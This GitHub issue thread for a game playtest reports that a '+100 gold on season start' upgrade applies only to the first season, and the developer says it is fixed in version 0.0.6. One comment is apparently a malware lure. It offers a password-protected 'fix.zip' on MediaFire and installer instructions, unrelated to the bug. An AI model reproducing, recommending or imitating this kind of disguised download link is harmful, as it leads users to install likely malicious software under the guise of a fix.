### ISSUE TITLE
+100 gold on season start only applies to first season

### ISSUE THREAD

**Issue by MildlyWarmToast** [Memori-Studios/CastlesOnClouds-Playtest#107]
### Current Behavior

was checking out the +100 gold on season start upgrade and noticed that it only applied to the first season

### Expected Behavior

by the description of the upgrade I figured it would apply to every season

### Steps To Reproduce

just equip the upgrade and get through season 1

### Playtest Version (top left)

v0.0.5

### Seed (copy button top left)

Seed: 111012-7939

### Environment Specs

- OS: windows 11
- GPU: nvidia gtx 1650
- CPU: amd ryzen 7 5800hs
- RAM: 16 gb

### Please Attach Player.Log and saveData.json files here

[saveData.json](https://github.com/user-attachments/files/16800807/saveData.json)
[Player.log](https://github.com/user-attachments/files/16800811/Player.log)

### Anything else?

nah

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Memori-Studios** [comment]
Fixed in 0.0.6, Thanks for reporting!

https://store.steampowered.com/news/app/1668620/view/4610084577357037789
